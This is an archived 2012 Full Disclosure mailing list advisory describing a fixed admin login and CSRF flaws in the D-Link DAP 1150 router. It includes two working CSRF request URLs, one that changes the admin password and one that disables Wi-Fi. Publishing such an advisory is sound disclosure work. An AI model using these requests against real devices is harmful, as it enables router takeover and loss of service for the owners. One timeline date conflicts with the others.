Full Disclosure mailing list archives
AoF and CSRF vulnerabilities in D-Link DAP 1150
From: "MustLive" <mustlive () websecurity com ua>
Date: Thu, 2 Feb 2012 19:04:16 +0200
Hello list! I want to warn you about new security vulnerabilities in D-Link DAP 1150 (Wi-Fi Access Point and Router). These are Abuse of Functionality and Cross-Site Request Forgery vulnerabilities. This is my third advisory from series of advisories about vulnerabilities in D-Link products. SecurityVulns ID: 12076. ------------------------- Affected products: ------------------------- Vulnerable is the next model: D-Link DAP 1150, Firmware version 1.2.94. This model with other firmware versions also must be vulnerable. D-Link decided not to fix these vulnerabilities, the same as they still haven't fixed many vulnerabilities in DSL-500T (form 2005). ---------- Details: ---------- Abuse of Functionality (WASC-42): The login of administrator is fixed (it's login "admin"), which can't be changed, only password. Which makes Brute Force attacks easier. CSRF (WASC-09): All functionality in admin panel is vulnerable to CSRF. Here are two examples. Changing of admin's password: http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_config_id=69&res_struct_size=1&res_buf=password| In section Wi-Fi / Common settings via CSRF it's possible to turn on/off Wi-Fi, and also to change MBSSID and BSSID. The next request will turn off Wi-Fi: http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:false,%20%22mbssidNum%22:1,%20%22mbssidCur%22:1} ------------ Timeline: ------------ 2011.11.17 - found vulnerabilities. 2011.12.10 - announced at my site. 2011.12.12 - informed developers. 2011.01.31 - disclosed at my site. I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/5561/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- AoF and CSRF vulnerabilities in D-Link DAP 1150 MustLive (Feb 02)